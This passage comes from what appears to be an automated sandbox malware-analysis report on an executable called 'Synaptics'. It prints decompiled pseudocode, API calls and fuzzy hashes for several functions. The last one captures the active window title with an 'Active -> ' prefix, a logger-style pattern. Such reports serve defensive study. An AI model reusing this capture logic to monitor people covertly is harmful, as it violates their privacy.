                                                                                                                                                                                                                            				_push(_t2);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                                                            • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cfe53fac7e6379baf7f1ecede3d93521c5abd9aeb3c7497eb158e8bc020ce62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00424E24(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				void* _t116;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                            				intOrPtr _t139;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = _t138;
                                                                                                                                                                                                                            				_t139 = _t138 + 0xffffffb4;
                                                                                                                                                                                                                            				_v80 = 0;
                                                                                                                                                                                                                            				_v76 = 0;
                                                                                                                                                                                                                            				_v72 = 0;
                                                                                                                                                                                                                            				_t116 = __eax;
                                                                                                                                                                                                                            				_push(_t137);
                                                                                                                                                                                                                            				_push(0x424fad);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t139;
                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                            					 *[fs:eax] = 0;
                                                                                                                                                                                                                            					_push(E00424FB4);
                                                                                                                                                                                                                            					return E004049E4( &_v80, 3);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t76 =  *0x49e8e0; // 0x21e0a30
                                                                                                                                                                                                                            					E00424168(_t76);
                                                                                                                                                                                                                            					_push(_t137);
                                                                                                                                                                                                                            					_push(0x424f85);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t139;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                                                                                                                                                            						_v68.lfHeight =  *(_v8 + 0x14);
                                                                                                                                                                                                                            						_v68.lfWidth = 0;
                                                                                                                                                                                                                            						_v68.lfEscapement = 0;
                                                                                                                                                                                                                            						_v68.lfOrientation = 0;
                                                                                                                                                                                                                            						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                                                                                                                                                                            							_v68.lfWeight = 0x190;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v68.lfWeight = 0x2bc;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                                                                                                                                                                            						E00404C24( &_v72, _v8 + 0x1b);
                                                                                                                                                                                                                            						if(E00408F88(_v72, "Default") != 0) {
                                                                                                                                                                                                                            							E00404C24( &_v80, _v8 + 0x1b);
                                                                                                                                                                                                                            							E0040A020( &(_v68.lfFaceName), _v80);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00404C24( &_v76, "\rMS Sans Serif");
                                                                                                                                                                                                                            							E0040A020( &(_v68.lfFaceName), _v76);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v68.lfQuality = 0;
                                                                                                                                                                                                                            						_v68.lfOutPrecision = 0;
                                                                                                                                                                                                                            						_v68.lfClipPrecision = 0;
                                                                                                                                                                                                                            						_t107 = E00425108(_t116) - 1;
                                                                                                                                                                                                                            						if(_t107 == 0) {
                                                                                                                                                                                                                            							_v68.lfPitchAndFamily = 2;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_t107 == 1) {
                                                                                                                                                                                                                            								_v68.lfPitchAndFamily = 1;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v68.lfPitchAndFamily = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t126);
                                                                                                                                                                                                                            					 *[fs:eax] = _t126;
                                                                                                                                                                                                                            					_push(E00424F8C);
                                                                                                                                                                                                                            					_t81 =  *0x49e8e0; // 0x21e0a30
                                                                                                                                                                                                                            					return E00424174(_t81);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5,004235EC,00000001), ref: 0042416C
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateCriticalEnterFontIndirectSection
                                                                                                                                                                                                                            • String ID: MS Sans Serif$Default
                                                                                                                                                                                                                            • API String ID: 2931345757-2137701257
                                                                                                                                                                                                                            • Opcode ID: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                                                            • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e26f0c9b99a2504c18667f81a18e76453e69d059f0a10168dcf74c802a2ab4c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0044E02C(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				signed short _v10;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t69 = _t71;
                                                                                                                                                                                                                            				_t72 = _t71 + 0xffffffec;
                                                                                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                                                                                            				_v16 = __eax;
                                                                                                                                                                                                                            				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                            				if(_v10 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(GetKeyState(0x10) < 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x2000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(GetKeyState(0x11) < 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x4000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x8000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                                                                                                                                                                            					_t34 =  *0x49ebac; // 0x21e0da8
                                                                                                                                                                                                                            					E0042C30C(_t34,  &_v24);
                                                                                                                                                                                                                            					_push(_t69);
                                                                                                                                                                                                                            					_push(0x44e12a);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t72;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_v17 = 0;
                                                                                                                                                                                                                            						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
                                                                                                                                                                                                                            						if(_v8 != 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_v24 == 0 || _v17 != 2) {
                                                                                                                                                                                                                            							_pop(_t64);
                                                                                                                                                                                                                            							 *[fs:eax] = _t64;
                                                                                                                                                                                                                            							_push(0x44e131);
                                                                                                                                                                                                                            							_t40 =  *0x49ebac; // 0x21e0da8
                                                                                                                                                                                                                            							return E0042C304(_t40);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t42 =  *0x49ebac; // 0x21e0da8
                                                                                                                                                                                                                            					E0042C30C(_t42,  &_v8);
                                                                                                                                                                                                                            					_push(_t69);
                                                                                                                                                                                                                            					_push(0x44e0ff);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t72;
                                                                                                                                                                                                                            					_v17 = E0044DED8( &_v8, 0, _t69);
                                                                                                                                                                                                                            					_pop(_t67);
                                                                                                                                                                                                                            					 *[fs:eax] = _t67;
                                                                                                                                                                                                                            					_push(0x44e106);
                                                                                                                                                                                                                            					_t48 =  *0x49ebac; // 0x21e0da8
                                                                                                                                                                                                                            					return E0042C304(_t48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L14:
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0044E050
                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0044E062
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1649606143-3916222277
                                                                                                                                                                                                                            • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = __esi;
                                                                                                                                                                                                                            				_t71 = __edi;
                                                                                                                                                                                                                            				_t74 = _t75;
                                                                                                                                                                                                                            				_t76 = _t75 + 0xfffffff0;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x45af60);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				_t56 = E0045ADD8(_v8);
                                                                                                                                                                                                                            				if( *((char*)(_v8 + 0x88)) != 0) {
                                                                                                                                                                                                                            					_t52 = _v8;
                                                                                                                                                                                                                            					_t79 =  *((intOrPtr*)(_t52 + 0x48));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
                                                                                                                                                                                                                            						E0045B3A8(_v8);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00458DF8(_t56,  &_v20);
                                                                                                                                                                                                                            				E004380E0(_v20, 0,  &_v16, _t79);
                                                                                                                                                                                                                            				_t36 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            				E0045B010(_t36, _v16, _t79);
                                                                                                                                                                                                                            				_v9 = 1;
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x45af07);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				if( *((short*)(_v8 + 0x102)) != 0) {
                                                                                                                                                                                                                            					_t56 = _v8;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v8 + 0x100))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v9 != 0) {
                                                                                                                                                                                                                            					E0045AD74();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t66);
                                                                                                                                                                                                                            				 *[fs:eax] = _t66;
                                                                                                                                                                                                                            				_t41 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_t67 =  *0x49de40; // 0x49e034
                                                                                                                                                                                                                            				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
                                                                                                                                                                                                                            					_v9 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v9 != 0) {
                                                                                                                                                                                                                            					WaitMessage();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t68);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68;
                                                                                                                                                                                                                            				_push(E0045AF67);
                                                                                                                                                                                                                            				return E004049E4( &_v20, 2);
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                                                                                                                                                                                            • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentCursorMessageThreadWait
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 535285469-2364942553
                                                                                                                                                                                                                            • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t77 = _t78;
                                                                                                                                                                                                                            				_t79 = _t78 + 0xfffffff8;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v12 = E00403BBC(1);
                                                                                                                                                                                                                            				_push(_t77);
                                                                                                                                                                                                                            				_push(0x42a46f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t79;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                                                                                                                                                                            				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                                                                                                                                                                            				_t80 = _t79 + 0xc;
                                                                                                                                                                                                                            				 *((char*)(_v12 + 0x70)) = _a8;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t62 =  *0x418ef8; // 0x418f44
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
                                                                                                                                                                                                                            				_pop(_t64);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				_push(0x49e8b0);
                                                                                                                                                                                                                            				L00406FE0();
                                                                                                                                                                                                                            				_push(_t77);
                                                                                                                                                                                                                            				_push(0x42a4cf);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t80;
                                                                                                                                                                                                                            				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                                                                                                                                                                            				E00428E6C(_v12);
                                                                                                                                                                                                                            				_pop(_t67);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_push(0x42a4d6);
                                                                                                                                                                                                                            				_push(0x49e8b0);
                                                                                                                                                                                                                            				L004071A0();
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID: P>B
                                                                                                                                                                                                                            • API String ID: 3168844106-1256901731
                                                                                                                                                                                                                            • Opcode ID: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
                                                                                                                                                                                                                            • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E004769AC(void* __ebx, void* __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                            				struct HWND__* _t48;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t67);
                                                                                                                                                                                                                            				_push(0x476a7b);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_t48 =  *(__edx + 4);
                                                                                                                                                                                                                            				if(_t48 > 0) {
                                                                                                                                                                                                                            					E0040500C( &_v8, GetWindowTextLengthA(_t48));
                                                                                                                                                                                                                            					_t28 = E00404C80(_v8) + 1;
                                                                                                                                                                                                                            					GetWindowTextA(_t48, E00404E80(_v8), _t28);
                                                                                                                                                                                                                            					_t32 =  *0x49ec6c; // 0x0
                                                                                                                                                                                                                            					E00408FF8(_t32,  &_v12);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					E00408FF8(_v8,  &_v16);
                                                                                                                                                                                                                            					_pop(_t37);
                                                                                                                                                                                                                            					E00404DCC(_t37, _v16);
                                                                                                                                                                                                                            					if(_t28 != 0) {
                                                                                                                                                                                                                            						E00408FF8(_v8,  &_v20);
                                                                                                                                                                                                                            						if(_v20 != 0) {
                                                                                                                                                                                                                            							E00404A14(0x49ec6c, _v8);
                                                                                                                                                                                                                            							E00404CCC( &_v24, _v8, "Active -> ");
                                                                                                                                                                                                                            							_t45 =  *0x49ec44; // 0x21e4a50
                                                                                                                                                                                                                            							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t55);
                                                                                                                                                                                                                            				 *[fs:eax] = _t55;
                                                                                                                                                                                                                            				_push(0x476a82);
                                                                                                                                                                                                                            				return E004049E4( &_v24, 5);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                                                                                                                                                                                            • GetWindowTextA.USER32 ref: 004769F4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow$Length
                                                                                                                                                                                                                            • String ID: Active ->
                                                                                                                                                                                                                            • API String ID: 1006428111-2811066380
                                                                                                                                                                                                                            • Opcode ID: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
